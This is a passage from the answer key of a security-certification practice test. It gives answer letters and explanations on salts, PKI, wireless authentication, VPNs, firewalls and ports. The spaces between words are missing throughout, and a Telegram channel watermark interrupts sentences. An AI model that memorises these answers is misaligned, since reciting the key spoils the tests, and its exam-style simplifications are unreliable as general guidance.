179. C. Saltreuseisacriticalmistake,becauseitwouldallowarainbowtabletobegeneratedusingthatsalt.Althoughstandardrainbowtableswouldnotwork,areusedsaltwouldonlyrequirethecreationofasinglenewrainbowtable.Alphanumericsaltsarenotaproblem,longsaltsarenotaproblem,andthissaltisareasonablelengthat16charactersusinghexadecimal.
180. B. Alaina’sneedforalocal,securestorageareaisanidealsituationfortheuseofavaultorsafewherethekeyscanbestoredonadevicelikeathumbdrive.Simplyplacingthemonadriveleavesthemvulnerabletotheft,andanair-gappedsystemwouldalsobepotentiallyexposedtotheftorlocalbreaches.
181. B. ItiscriticaltoauthenticateAPIusersandthentoauthorizethemtotakeactions.Ifyouauthorizedfirstandthenauthenticated,userscouldtakeactionbeforeyouknewwhotheywere!EncryptingthroughouttheuseoftheAPIkeepsdataandqueriessecure,validatinginputandfilteringoutdangerousstringsisimportanttopreventinjectionandotherattacks,andauditingandloggingallowsyoutotroubleshootandrespondtoissuesandattacks.
182. C. Frankhasusedadegaussertoerasethedataonthetapes.Degaussing
Telegram Channel @nettrain
onlyworksonmagneticmedialiketapesandwillnotworkonopticalorflashmedia.Burningmediaormaterialsisexactlywhatitsoundslike—puttingthemintoafire!Shreddingandpulpingaremechanicalmeansofdestruction.
183. A. 5Grequireshigherantennadensityforfullbandwidthcommunicationthanprevioustechnologies,meaningthatAngela’sorganizationwillhavetocarefullyconsiderantennaplacement,particularlyinsidebuildingswherestructuralelementscancreatechallengeswithsignalpropagation.5Gisusableindoors,iscommerciallyavailable,andcancoexistwithtraditionalWi-Fi,soAngelashouldnotincludethoseinherlistofconcerns.
184. A. Chrisisconcernedaboutprivilegecreep,theslowaccumulationofprivilegesovertimeasstaffmemberschangerolesandtheirprivilegesarenotremovedorupdated.Privilegemanagementprocesseswouldhelptopreventthis,thuskeepingdatamoresecure.Oftheotheroptions,onlyprivilegeescalationisacommonterm,anditmeansgainingadditionalprivileges,typicallyaspartofanattackfromanaccountwithfewerprivilegestoamoreprivilegedaccountlikeanadministratororrootaccount.
185. C. Honeyfilesarefilesthatareintendedtohelpdetectattackers.Theyareplacedinalocationwhereaccessingthemcanbedetectedbutarenotsetuptoallowuserstoaccessthem.Thatmeansthatattackerswhoaccesstheseeminglydesirablefilecanbeeasilydetectedandappropriatealertscanbesent.
186. C. Althoughthereisnospecificrecommendeddistance,recommendationstypicallyrangefrom60to120milesawaytoensurethatasingledisasterisunlikelytodisablebothlocations.
187. B. FogcomputingisatermcoinedbyCiscotodescribecloudcomputingattheedgeofanenterprisenetwork.Themorecommontermforthisisedgecomputing,butyoumayencounterbothterms.Fogimplementationshandlesignificantamountsofcomputation,communication,andstorageactivitieslocally,whilealsoconnectingtocloudservicestoperformsomeofthework.
188. A. Bcrypt,scrypt,andPBKDF2areallexamplesofkeystretchingalgorithms.MD5andSHA1arebothhashingalgorithms,andncryptwasmadeupforthisquestion.
189. C. TheonlydirectoryservicelistedisLightweightDirectoryAccess
Telegram Channel @nettrain
Protocol(LDAP).SAMLisSecurityAssertionMarkupLanguage,OAuthisanauthorizationdelegationprotocol,and802.1xisanetworkauthenticationprotocol.
Telegram Channel @nettrain
Chapter3:Implementation1. A. Dualcontrol,whichrequirestwoindividualstoperformafunction;
splitknowledge,whichsplitsthepassphraseorkeybetweentwoormorepeople;andseparationofduties,whichensuresthatasingleindividualdoesnotcontroloroverseetheentireprocessallhelppreventinsiderthreatswhenmanagingaPKI.Requiringanewpassphrasewhenacertificateisusedisnotareasonablesolutionandwouldrequirereissuingthecertificate.
2. B. AsitesurveyistheprocessofidentifyingwhereaccesspointsshouldbelocatedforbestcoverageandidentifyingexistingsourcesofRFinterference,includingpreexistingwirelessnetworksandotherdevicesthatmayusethesameradiofrequencyspectrum.Byconductingasitesurvey,Naomicanguidetheplacementofheraccesspointsaswellascreateachanneldesignthatwillworkbestforherorganization.
3. B. TheoptionthatbestmeetstheneedsdescribedaboveisPEAP,theProtectedExtensibleAuthenticationProtocol.PEAPreliesonserver-sidecertificatesandreliesontunnelingtoensurecommunicationssecurity.EAP-MD5isnotrecommendedforwirelessnetworksanddoesnotsupportmutualauthenticationofthewirelessclientandnetwork.LEAP,theLightweightExtensibleAuthenticationProtocol,usesWEPkeysforitsencryptionandisnotrecommendedduetosecurityissues.Finally,EAP-TLS,orEAPTransportLayerSecurity,requirescertificatesonboththeclientandserver,consumingmoremanagementoverhead.
4. C. East-westtrafficistrafficsentlaterallyinsideanetwork.Somenetworksfocussecuritytoolsattheedgesorplaceswherenetworksinterconnect,leavinginternal,oreast-west,trafficopen.Inzero-trustenvironments,internaltrafficisnotpresumedtobetrustworthy,reducingtherisksofthistypeoflateralcommunication.Side-stepping,slidertraffic,andpeerinterconnectwereallmadeupforthisquestion,althoughpeerinterconnectmaysoundsimilartopeer-to-peertraffic,whichmaybelateralinmanynetworks.
5. C. AlthoughpreventingMultipurposeInternetMailExtensions(MIME)sniffingmaysoundhumorous,MIMEsniffingcanbeusedincross-sitescriptingattacks,andtheX-Content-Type-OptionsheaderhelpspreventMIMEsniffing.HTTPsecurity-orientedheaderscanalsosetX-Frameoptions,turnoncross-sitescriptingprotection,setcontentsecuritypolicies,
Telegram Channel @nettrain
andrequiretransportsecurity.Thereisn’ta“DisableSQLinjection”header,however!
6. C. Mobiledevicemanagement(MDM)suitesoftenprovidetheabilitytomanagecontentondevicesaswellasapplications.UsingcontentmanagementtoolscanallowCharlenetoprovisionfiles,documents,andmediatothedevicesthatstaffmembersinherorganizationareissued.Applicationmanagementwouldbeusefulforapps.Remotewipecanremovedataandapplicationsfromthedeviceifitislostorstolen,oranemployeeleavestheorganization.Pushnotificationsareusefulwheninformationneedstobeprovidedtothedeviceuser.
7. C. Inthisscenario,Dennyspecificallyneedstoensurethathestopsthemostmalware.Insituationslikethis,vendordiversityisthebestwaytodetectmoremalware,andinstallingadifferentvendor’santivirus(AV)packageonserverslikeemailserversandtheninstallingamanagedpackageforPCswillresultinthemostdetectionsinalmostallcases.InstallingmorethanoneAVpackageonthesamesystemisrarelyrecommended,sincethisoftencausesperformanceissuesandconflictsbetweenthepackages—infact,attimesAVpackageshavebeenknowntodetectotherAVpackagesbecauseofthedeephookstheyplaceintotheoperatingsystemtodetectmaliciousactivity!
8. B. Amandahasencounteredacaptiveportal.Captiveportalsredirectalltraffictotheportalpage,eithertoallowtheportaltocollectinformationortodisplaythepageitself.Onceusershavecompletedtherequirementsthattheportalputsinplace,theyarepermittedtobrowsetheInternet.ThismaybeaccomplishedbyassigninganewIPaddressorbyallowingtheconnectedIPaddresstohaveaccesstotheInternetusingafirewallruleorothersimilarmethod.Presharedkeysareusedinwirelessnetworksforauthentication.Portsecurityisusedforwirednetworks,andWPAstandsforWi-FiProtectedAccess,asinWPA,WPA-2,andWPA-3.
9. B. DomainNameSystemSecurityExtensions,orDNSSEC,providestheabilitytovalidateDNSdataanddenialofexistence,andprovidesdataintegrityforDNS.Itdoesnotprovideconfidentialityoravailabilitycontrols.IfCharlesneedstoprovidethose,hewillhavetoimplementadditionalcontrols.
10. B. Googleisactingasanidentityprovider,orIdP.AnIdPcreatesandmanagesidentitiesforfederations.AnRPisarelyingparty,whichrelieson
Telegram Channel @nettrain
anidentityprovider.AnSPisaserviceprovider,andanRAisaregistrationauthorityinvolvedintheprocessforprovidingcryptographiccertificates.
11. C. SSH,orSecureShell,isasecureprotocolusedtoconnecttocommand-lineshells.SSHcanalsobeusedtotunnelotherprotocols,makingitausefulandfrequentlyusedtoolforsystemadministrators,securityprofessionals,andattackers.UsingHTTPSorTransportLayerSecurity(TLS)forasecurecommandlineisrare,andTelnetisaninsecureprotocol.
12. B. Oftheoptionsprovided,onlyFIDOU2F,anopenstandardprovidedbytheFastIDentityOnlineAlliance,isastandardforsecuritykeys.OtherstandardsthatyoumayencounterincludeOTP(OneTimePassword),SmartCard,OATH-HOTP,andOpenPGP.Ofnote,OATH,theInitiativeforOpenAuthentiationprovidesstandardsbothHMAC-basedonetimepassword(HOTP)andTOTP,ortime-basedonetimepasswords.SAML(SecurityAssertionMarkupLanguage)andOpenIDarebothusedinauthenticationprocessesbutnotforsecuritykeys.ARFwasmadeupforthisquestion.
13. C. NadiashoulduseSecure/MultipurposeInternetMailExtensions(S/MIME),whichsupportsasymmetricencryptionandshouldthenuseDanielle’spublickeytoencrypttheemailsothatonlyDaniellecandecryptthemessagesandreadthem.SecurePOP3wouldprotectmessageswhilethey’rebeingdownloadedbutwouldnotprotectthecontentofthemessagesbetweenservers.
14. B. SRTPisasecureversionoftheReal-TimeTransportProtocolandisusedprimarilyforVoiceoverIP(VoIP)andmultimediastreamingorbroadcast.SRTP,ascurrentlyimplemented,doesnotfullyprotectpackets,leavingRTPheadersexposed,potentiallyexposinginformationthatmightprovideattackerswithinformationaboutthedatabeingtransferred.
15. C. Oliviashouldmakeherorganizationawarethatafailureinoneoftheactivenodeswouldresultinlessmaximumthroughputandapotentialforservicedegradation.Sinceservicesarerarelyrunatmaximumcapacity,andmanycanhavemaintenancewindowsscheduled,thisdoesnotmeanthattheloadbalancerscannotbepatched.Thereisnothinginthisdesignthatmakestheloadbalancersmorevulnerabletodenialofservicethantheywouldbeunderanyotherdesign.
16. A. FileTransferProtocolSecure(FTPS)typicallyusesport990forimplicitFTPSandport21,thenormalFTPcommandport,isusedfor
Telegram Channel @nettrain
explicitFTPS.Port22isusedforSSH,433wasusedfortheNetworkNewsTransferProtocol(NNTP),1433isusedforMicrosoftSQL,andport20isusedforFTP.
17. A. CertificatestaplingallowstheserverthatispresentingacertificatetoprovideamoreefficientwaytochecktherevocationstatusofthecertificateviatheOnlineCertificateStatusProtocol(OCSP)byincludingtheOCSPresponsewiththehandshakeforthecertificate.Thisprovidesbothgreatersecuritybecauseclientsknowthatthecertificateisvalid,andgreaterefficiencybecausetheydon’thavetoperformaseparateretrievaltocheckthecertificate’sstatus.Therestoftheoptionsweremadeupandarenotcertificatestapling.
18. B. Aregistrationauthority,orRA,receivesrequestsfornewcertificatesaswellasrenewalrequestsforexistingcertificates.Theycanalsoreceiverevocationrequestsandsimilartasks.AnintermediaCAistrustedbytherootCAtoissuecertificates.ACRLisacertificaterevocationlist.
19. C. Leastconnection-basedloadbalancingtakesloadintoconsiderationandsendsthenextrequesttotheserverwiththeleastnumberofactivesessions.Roundrobinsimplydistributesrequeststoeachserverinorder,whereasweightedtimeuseshealthcheckstodeterminewhichserverrespondsthemostquicklyonanongoingbasisandthensendsthetraffictothatserver.Finally,sourceIPhashingusesthesourceanddestinationIPaddressestogenerateahashkeyandthenusesthatkeytotracksessions,allowinginterruptedsessionstobereallocatedtothesameserverandthusallowingthesessionstocontinue.
20. A. IPSec’sAuthenticationHeader(AH)protocoldoesnotprovidedataconfidentialitybecauseitsecuresonlytheheader,notthepayload.ThatmeansthatAHcanprovideintegrityandreplayprotectionbutleavestherestofthedataatrisk.MattshouldnotethisandexpressconcernsaboutwhytheVPNisnotusingEncapsulatingSecurityProtocol(ESP).
21. C. MichelleknowsthatPOP3runsonport110bydefault,andthatTLS(viaSTARTTLSasanextension)allowsPOP3clientstorequestasecureconnectionwithoutneedingtousethealternateport995usedinsomeconfigurations.Port25isthedefaultportforSimpleMailTransferProtocol(SMTP),andIKEisusedforIPSec.
22. A. Acloudaccesssecuritybroker(CASB)isasoftwaretoolorservicethatsitsbetweenanorganization’son-premisesnetworkandacloudprovider’s
Telegram Channel @nettrain
infrastructure.ACASBactsasagatekeeper,allowingtheorganizationtoextendthereachoftheirsecuritypoliciesintothecloud.
23. A. Angela’scompanyhasdeployedaversionofSessionInitiationProtocol(SIP)thatdoesn’tuseTransportLayerSecurity(TLS)tomaintainconfidentiality.SheshouldswitchtoaSIPSecure(SIPS)implementationtoprotecttheconfidentialityofphoneconversations.Vishing,orvoicephishing;wardialing,whichattemptstomapallnumbersforaphoneservice,typicallytofindmodems;anddenialofservicearealllesslikelyonaVoIPnetwork,althoughtheycouldoccur.
24. B. ThefastestwayforAlainatoimplementsecuretransportforherNetworkTimeProtocol(NTP)trafficwilltypicallybetosimplytunnelthetrafficviaSecureShell(SSH)fromtheNTPservertoherLinuxsystems.AnIPSecvirtualprivatenetwork(VPN)betweendeviceswilltypicallytakemoreworktosetupandmaintain,althoughthiscouldbescripted,andaTransportLayerSecurity(TLS)VPNwouldrequireadditionalworksinceitisintendedforwebtraffic.RDPistheRemoteDesktopProtocolandisprimarilyusedforWindowssystemsandwouldnotbeagoodchoice.Inmostenvironments,however,NTPtrafficdoesnotreceiveanyspecialsecurity,andNTPsourcesaretrustedtoperformwithoutexceptionalsecuritymeasures.
25. D. ThesafestandmostsecureansweristhatRamonshouldsimplyimplementTLSfortheentiresite.AlthoughTLSdoesintroducesomeoverhead,modernsystemscanhandlelargenumbersofsimultaneousTLSconnections,makingasecurewebsiteaneasyanswerinalmostallcases.
26. D. AlthoughIPaddressesforpublicserversandclientsarenottypicallyconsideredsensitive,theusernames,passwords,andfilesthatthecontractorsusewouldbe.KatieshouldconsiderhelpingherorganizationtransitiontoasecureFTPorotherservicetoprotectherorganization’scustomersandtheorganizationitself.
27. D. DynamicHostConfigurationProtocol(DHCP)sniffingorsnoopingcanbeenabledtopreventrogueDHCPserversaswellasmaliciousormalformedDHCPtraffic.ItalsoallowsthecaptureandcollectionofDHCPbindinginformationtoletnetworkadministratorsknowwhoisassignedwhatIPaddress.
28. B. Aaroncanuseawildcardcertificatetocoverallthehostsinsideofasetofsubdomains.Wildcardsonlycoverasinglelevelofsubdomain,however,
Telegram Channel @nettrain
soifhepurchased*.example.com,hecouldnotuse*.blog.example.com.Aself-signedcertificatewillcauseerrorsforvisitorsandshouldnotbeusedforproductionpurposes.Self-signedcertificateswillcreateerrorsinmostbrowsersandsoarenotusedinproductionenvironments.Extendedvalidation(EV)certificateswillnotprovidethisfunctionality,andSecureSocketsLayer(SSL)isnolongerinusewiththeswitchtoTLSforsecurityreasons.
29. D. RootGuardcanbesetonaper-portbasistoprotectportsthatwillneverbesetuptobetherootbridgeforaVLAN.Sincethisshouldn’tchangeregularly,itissafetosetformostportsinanetwork.Spanningtreeisusedtopreventloops,sodisablingSTPwouldactuallymakethisproblemmorelikely.BridgeIDscannotbenegative,andBridgeProtectwasmadeupforthisquestion.
30. C. APersonalInformationExchange(PFX)formattedfileisabinaryformatusedtostoreservercertificates,aswellasintermediarycertificates,anditcanalsocontaintheserver’sprivatekey.PrivacyEnhancedMail(PEM)filescancontainmultiplePEMcertificatesandaprivatekey,butmostsystemsstorecertificatesandthekeyseparately.DistinguishedEncodingRules(DER)formatfilesarefrequentlyusedwithJavaplatformsandcanstorealltypesofcertificatesandprivatekeys.P7B,orPKCS#7,formattedfilescancontainonlycertificatesandcertificatechains,notprivatekeys.Fortheexam,youshouldalsoknowthataCERisafileextensionforanSSLcertificatefileformatusedbywebserverstohelpverifytheidentityandsecurityofthesiteinquestion.SSLcertificatesareprovidedbyathird-partysecuritycertificateauthoritysuchasVeriSign,GlobalSign,orThawte.
AP12filecontainsadigitalcertificatethatusesPKCS#12(PublicKeyCryptographyStandard#12)encryption.TheP12filecontainsboththeprivateandthepublickey,aswellasinformationabouttheowner(name,emailaddress,etc.),allbeingcertifiedbyathirdparty.Withsuchacertificate,ausercanidentifythemselvesandauthenticatethemselvestoanyorganizationtrustingthethirdparty.
31. D. Afirewallhastwotypesofrules.Onetypeistoallowspecifictrafficonagivenport.Theothertypeofruleistodenytraffic.Whatisshownhereisatypicalfirewallrule.OptionsA,B,andCareincorrect.Theruleshownisclearlyafirewallrule.
Telegram Channel @nettrain
32. C. ManysubscriptionservicesallowfordataretrievalviaHTTPS.Tedcansubscribetooneormorethreatfeedsorreputationservices,andthenfeedthatinformationtoanintrusiondetectionsystem(IDS),intrusionpreventionsystem(IPS),next-generationfirewall,orsimilarnetworksecuritytool.SecurityAssertionMarkupLanguage(SAML)isusedtomakeassertionsaboutidentitiesandauthorization,aVDIisavirtualdesktopenvironment,andFDEisfull-diskencryption.
33. B. SecurecookiesareHTTPcookiesthathavethesecureflagset,thusrequiringthemtoonlybesentviaasecurechannellikeHTTPS.Theyarenotstoredinencryptedformorhashed,andcookiekeysweremadeupforthisquestion.
34. D. UnlikeIPSec’stunnelmode,IPSectransportmodeallowsdifferentpoliciesperport.TheIPaddressesintheouterheaderfortransportmodepacketsareusedtodeterminethepolicyappliedtothepacket.IPSecdoesn’thaveaPSKmode,butWPA-2does.IKEisusedtosetupsecurityassociationsinIPSecbutdoesn’tallowthistypeofmodesetting.
35. A. WPSpersonalidentificationnumbers(PINs)wererevealedtobeaproblemin2011,whenapracticalbrute-forceattackagainstWPSPINsetupmodeswasdemonstrated.WPSsuffersfromavarietyofothersecurityissuesandisnotusedforenterprisesecurity.WPSremainsinuseinhomeenvironmentsforeaseofsetup.
36. C. TheOnlineCertificateStatusProtocol,orOCSP,isusedtodeterminethestatusofacertificate.RTCP,CRBL,andPKCRLwereallmadeupforthisquestion.
37. C. Certificaterevocationlists(CRLs)aredesignedspecificallyforrevokingcertificates.Sincepublickeysaredistributedviacertificates,thisisthemosteffectivewaytodeauthorizeapublickey.OptionAisincorrect.Simplynotifyingusersthatakey/certificateisnolongervalidisnoteffective.OptionBisincorrect.Deletingacertificateisnotalwayspossibleandignoresthepossibilityofaduplicateofthatcertificateexisting.OptionDisincorrect.Theregistrationauthority(RA)isusedincreatingnewcertificates,notinrevokingthem.
38. C. GlobalPositioningSystem(GPS)dataanddataaboutlocalWi-Finetworksarethetwomostcommonlyusedprotocolstohelpgeofencingapplicationsdeterminewheretheyare.WhenaknownWi-Fisignalisgainedorlost,thegeofencingapplicationknowsitiswithinrangeofthat
Telegram Channel @nettrain
network.GPSdataisevenmoreusefulbecauseitcanworkinmostlocationsandprovideaccuratelocationdata.AlthoughBluetoothissometimesusedforgeofencing,itslimitedrangemeansthatitisathirdchoice.Cellularinformationwouldrequireaccuratetower-basedtriangulation,whichmeansitisnottypicallyusedforgeofencingapplications,andofcourseUSBisawiredprotocol.
39. A. Thedemilitarizedzone(DMZ)isazonebetweenanouterfirewallandaninnerfirewall.Itisspecificallydesignedasaplacetolocatepublic-facingservers.Theouterfirewallismorepermissive,thusallowingpublicaccesstotheserversintheDMZ.However,theinnerfirewallismoresecure,thuspreventingoutsideaccesstothecorporatenetwork.
40. C. Thefirststepinsecurityishardeningtheoperatingsystem,andoneofthemostelementaryaspectsofthatisturningoffunneededservices.Thisistrueregardlessoftheoperatingsystem.Althoughinstallingantimalware,implementingusagepolicies,andsettingpasswordreusepoliciesareallgoodpractices,turningoffunnecessaryservicesistypicallythefirststepinsecuringasystem..
41. C. Knowledge-basedauthenticationrequiresinformationthatonlytheuserislikelytoknow.Examplesincludethingslikeprevioustaxpayments,billamounts,andsimilarinformation.RequestingaSocialSecuritynumberislesssecureandwouldonlyworkforusersintheUnitedStates.FederatedidentityviaGoogleaccountsdoesnotmeetthisneedbecauseGoogleaccountsdonothaveauservalidationrequirement.Finally,validationemailsonlyprovethattheuserhasaccesstoanaccountthattheyprovide,notthattheyareaspecificindividual.
42. A. ATransportLayerSecurity(TLS)VPNisfrequentlychosenwheneaseofuseisimportant,andwebapplicationsaretheprimaryusagemode.IPSecVPNsareusedforsite-to-siteVPNsandforpurposeswhereotherprotocolsmaybeneeded,becausetheymaketheendpointsystemappeartobeontheremotenetwork.
43. A. Full-diskencryption(FDE)fullyencryptstheharddriveonacomputer.Thisisaneffectivemethodforensuringthesecurityofdataonacomputer.TrustedPlatformModules(TPMs)arestorekeysandareusedforbootintegrityandothercryptographicneedsandwon’tdirectlyprotectthedata.Software-definednetworking(SDN)isvirtualizednetworking,anddemilitarizedzones(DMZs)areusedtosegmentanetworkandwon’taffect
Telegram Channel @nettrain
thisproblem.
44. A. ADMZ(demilitarizedzone)provideslimitedaccesstopublic-facingserversforoutsideusers,butblocksoutsideusersfromaccessingsystemsinsidetheLAN.ItisacommonpracticetoplacewebserversintheDMZ.AvirtualLAN,orVLAN,ismostoftenusedtosegmenttheinternalnetwork,routersdirecttrafficbasedonIPaddress,andaguestnetworkallowsinternaluserswhoarenotemployeestogetaccesstotheInternet.
45. D. Identityattributesarecharacteristicsofanidentity,includingdetailsliketheindividual’sbirthdate,age,jobtitle,address,oramultitudeofotherdetailsabouttheidentity.Theyareusedtodifferentiatetheidentityfromothersandmayalsobeusedbytheidentitymanagementsystemorconnectedsystemsincoordinationwiththeidentityitself.Rolesdescribethejoborpositionanindividualhasinanorganization,andfactorsaresomethingyouknow,somethingyouhave,orsomethingyouare.Identifiersarenotacommonsecurityorauthenticationterm,althoughidentityis.
46. D. TheCN,orcommonname,foracertificateforasystemistypicallythefullyqualifieddomainname(FQDN)fortheserver.IfMeganwasrequestingacertificateforherself,insteadofforaserver,shewoulduseherfullname.
47. B. PhysicallyportioningyournetworkisthephysicalequivalentofavirtualLAN,orVLAN.AVLANisdesignedtoemulatephysicalpartitioning.Perimetersecuritydoesnotsegmentthenetwork.Securityzonesareusefulbutdon’t,bythemselves,segmentanetwork.Oftenanetworkissegmented,usingphysicalpartitionsorVLAN,tocreatesecurityzones.Afirewallismeanttoblockcertaintraffic,nottosegmentthenetwork,althoughafirewallcanbepartofasegmentationorsecurityzoneimplementation.
48. D. Nelsonisusingawhitelisting(orallowedlist)tool.Toolslikethisallowonlyspecificapplicationstobeinstalledandrunonasystemandoftenusehashesofknowngoodapplicationstoensurethattheapplicationsarethosethatarepermitted.Ablacklisting(orblockedlist)toolpreventsspecificapplicationsorfilesfrombeingused,stored,ordownloadedtoasystem.Althoughantivirusandantimalwaretoolsmayhavesimilarfeatures,themostaccurateanswerhereiswhitelisting.
49. B. Astatefulinspectionfirewallexaminesthecontentandcontextofeachpacketitencounters.Thismeansthatastatefulpacketinspection(SPI)
Telegram Channel @nettrain
firewallunderstandstheprecedingpacketsthatcamefromthesameIPaddress,andthusthecontextofthecommunications.Thismakescertainattacks,likeaSYNflood,almostimpossible.Packetfilteringfirewallsexamineeachpacketbutnotthecontext.Application-layerfirewallscanuseSPIorsimplepacketfiltering,buttheirprimaryroleistoexamineapplication-specificissues.Acommonexampleisawebapplicationfirewall.Agatewayfirewallissimplyafirewallatthenetworkgateway.ThisdoesnottelluswhetheritispacketfilteringorSPI.
50. A. Wirelessnetworkheatmapsareusedtoshowhowstrongwirelessnetworksignalsarethroughoutabuildingorlocation.Scottcanuseaheatmaplikethistoseewherethewirelesssignaldropsofforwhereinterferencemayoccur.Anetworkdiagramwouldshowthelogicallayoutofanetwork.Ademilitarizedzone(DMZ)isanetworksecurityzonethatisexposedtoahigherriskregion,andazonemapisnotacommonsecurityterm.
51. B. Ademilitarizedzone(DMZ)isaseparatesubnetcomingofftheseparaterouterinterface.PublictrafficmaybeallowedtopassfromtheexternalpublicinterfacetotheDMZ,butitwon’tbeallowedtopasstotheinterfacethatconnectstotheinternalprivatenetwork.AguestnetworkprovidesvisitorswithInternetaccess.Anintranetconsistsofinternalwebresources.Frequentlycompaniesputupwebpagesthatareaccessibleonlyfromwithinthenetworkforitemslikehumanresourcesnotifications,vacationrequests,andsoforth.AvirtualLAN,orVLAN,isusedtosegmentyourinternalnetwork.
52. C. Theapplicationincludesinputvalidationtechniquesthatareusedtoensurethatunexpectedormaliciousinputdoesnotcauseproblemswiththeapplication.Inputvalidationtechniqueswillstripoutcontrolcharacters,validatedata,andperformavarietyofotheractionstocleaninputbeforeitisprocessedbytheapplicationorstoredforfutureuse.Thisvalidationmayhelppreventbufferoverflows,butothertechniquesdescribedherearenotusedforbufferoverflowprevention.Stringinjectionisactuallysomethingthishelpstoprevent,andschemavalidationlooksatdatatoensurethatrequestsmatchaschema,butagainthisisanarrowerdescriptionthanthebroadrangeofinputvalidationoccurringinthedescription.
53. C. WPA3supportsSAE,orsimultaneousauthenticationofequals,providingamoresecurewaytoauthenticatethatlimitsthepotentialforbrute-forceattacksandallowsindividualstousedifferentpasswords.WPA
Telegram Channel @nettrain
isnotassecureasWPA2,andWEPistheoldest,andleastsecure,wirelesssecurityprotocol.
54. A. Inordertostopattacktraffic,anIPSneedstobedeployedinline.Deploymentsthatuseanetworktapreceiveacopyofthedatawithoutbeingintheflowoftraffic,whichmakesthemidealfordetectionbutremovestheabilitytostoptraffic.Deployingasanintrusiondetectionsystem(IDS)insteadofanIPSmeansthatthesystemwillonlydetect,notstop,attacks.
55. B. Thecorrectansweristouseasandboxedenvironmenttotestthemalwareanddetermineitscompletefunctionality.Asandboxedsystemcouldbeanisolatedvirtualmachine(VM)oranactualphysicalmachinethatisentirelyisolatedfromthenetwork.Leavingthemalwareonaproductionsystemisneverthecorrectapproach.Youshouldtestoranalyzethemalwaretodetermineexactlywhatmalwareitis,allowingyoutorespondtothethreatproperly.Ahoneypotisusedforluringandtrappingattackers,notfortestingmalware.
56. B. Hardeningistheprocessofimprovingthesecurityofanoperatingsystemorapplication.OneoftheprimarymethodsofhardeningatrustedOSistoeliminateunneededprotocols.ThisisalsoknownascreatingasecurebaselinethatallowstheOStorunsafelyandsecurely.FDEisfull-diskencryption,aSEDisaself-encryptingdrive,andbaseliningistheprocessofestablishingsecuritystandards.
57. C. Althoughtrustinthesiteislikelytobereducedbecauseuserswillreceivewarnings,theactualunderlyingencryptioncapabilitieswillnotchange.Userswillnotberedirectedtothecertificateauthority’ssite,andiftheyclickpastthewarnings,userswillbeabletocontinuenormallyandwithanencryptedconnection.
58. D. Isaacknowsthattrustingclientsystemstobesecureisnotagoodidea,andthusensuringthatvalidationoccursonatrustedclientisnotanappropriaterecommendation.Ensuringthatvalidationoccursonatrustedserver,thatclientdataisvalidated,andthatdatatypesandrangesarereasonableareallgoodbestpracticesforhimtorecommend.
59. C. TrustedPlatformModules(TPMs)providearandomnumbergenerator,theabilitytogeneratecryptographickeys,supportforremoteattestationaspartofthebootprocess,aswellasbindingandsealingcapabilities.TheydonotactascryptographicprocessorstospeedupSecureSocketsLayer(SSL)
Telegram Channel @nettrain
orTransportLayerSecurity(TLS)traffic.
60. B. Hashingiscommonlyusedindatabasestoincreasethespeedofindexingandretrievalsinceitistypicallyfastertosearchforahashedkeyratherthantheoriginalvaluestoredinadatabase.Hashingisnotaformofencryption,meaningthatitisnotusedtoencryptstoreddata.Hashingisnotusedtoobfuscatedataortosubstituteforsensitivedata.
61. C. Thecorrectansweristoonlyallowsignedcomponentstobeloadedinthebrowser.Codesigningverifiestheoriginatorofthecomponent(suchasanActiveXcomponent)andthusmakesmalwarefarlesslikely.Althoughhost-basedantimalwareisagoodidea,itisnotthebestremedyforthisspecificthreat.Blacklistscannotcoverallsitesthatareinfected—justthesitesyouknowabout.AndgiventhatusersonHans’snetworkvisitalotofwebsites,blacklistingislikelytobeineffective.Finally,ifyoublockallactivecontent,manywebsiteswillbecompletelyunusable.
62. B. Zarmeenahasimplementedapresharedkey,orPSK,authenticationmethod.Thismeansthatifsheneedstochangethekeybecauseastaffmemberleaves,shewillneedtohaveeverydeviceupdatetheirpassphrase.Forlargerdeployments,enterpriseauthenticationcanconnecttoanauthenticationandauthorizationservice,allowingeachusertoauthenticateasthemselves.Thisalsoprovidesnetworkadministratorswithawaytoidentifyindividualdevicesbytheirauthenticateduser.Opennetworksdonotrequireauthentication,althoughacaptiveportalcanbeusedtorequirenetworkuserstoprovideinformationbeforetheyareconnectedtotheInternet.
63. A. EAP-FASTisspecificallydesignedfororganizationsthatwanttoquicklycompletereconnectionsanddoesnotrequirecertificatestobeinstalledattheendpointdevice.EAPTunneledTransportLayerSecurity(EAP-TTLS)requiresclient-sidecertificates;EAP-TLSrequiresmutualauthentication,whichcanbeslower;andProtectedExtensibleAuthenticationProtocol(PEAP)issimilartoEAP-TTLS.
64. A. Thecorrectansweristoimplementavirtualdesktopinfrastructure(VDI).Ifallthedesktopsarevirtualized,thenfromasinglecentrallocationyoucanmanagepatches,configuration,andsoftwareinstallation.Thissingleimplementationwillsolvealltheissuesmentionedinthequestion.Restrictivepoliciesareagoodideabutareoftendifficulttoenforce.Imagingworkstationswillaffectonlytheiroriginalconfiguration;itwon’t
Telegram Channel @nettrain
keepthempatchedorpreventroguesoftwarefrombeinginstalled.Finally,strongpatchmanagementwilladdressonlyoneofthethreeconcerns.
65. B. Deployingtomultiplelocationsispartofahighavailabilitystrategythatensuresthatlosingadatacenterordatacentersinasingleregion,orlossofnetworkconnectivitytothatregion,willnottakeaninfrastructuredown.Thisdoesnotprovidegreaterresistancetoinsiderattacks,lowercosts,orvendordiversity.
66. B. ATLS-basedVPN(oftencalledanSSL-basedVPN,despiteSSLbeingoutmoded)providestheeasiestwayforuserstouseVPNsinceitdoesnotrequireaclient.SSLVPNsalsoworkonlyforspecificapplicationsratherthanmakingasystemappearasthoughitisfullyonaremotenetwork.HTML5isnotaVPNtechnology,butsomeVPNportalsmaybebuiltusingHTML5.SecurityAssertionMarkupLanguage(SAML)isnotaVPNtechnology.IPSecVPNsrequireaclientorconfigurationandarethusharderforenduserstouseinmostcases.
67. C. Theseparticularwebapplicationattacksarebestmitigatedwithproperinputvalidation.Anyuserinputshouldbecheckedforindicatorsofcross-sitescripting(XSS)orSQLinjection.Errorhandlingisalwaysimportant,butitwon’tmitigatetheseparticularissues.StoredprocedurescanbeagoodwayofensuringSQLcommandsarestandardized,butthatwon’tpreventtheseattacks.Codesigningisusedforcodethatisdownloadedfromawebapplicationtotheclientcomputer;itisusedtoprotecttheclient,notthewebapplication.
68. C. Isaaccanconfigureageofencethatdefineshiscorporatebuildingsandcampus.Hecanthensetupageofencepolicythatwillonlyallowdevicestoworkwhiletheyareinsidethatgeofencedarea.Patchmanagement,IPfiltering,andnetworkrestrictionsarenotsuitablesolutionsforthis.
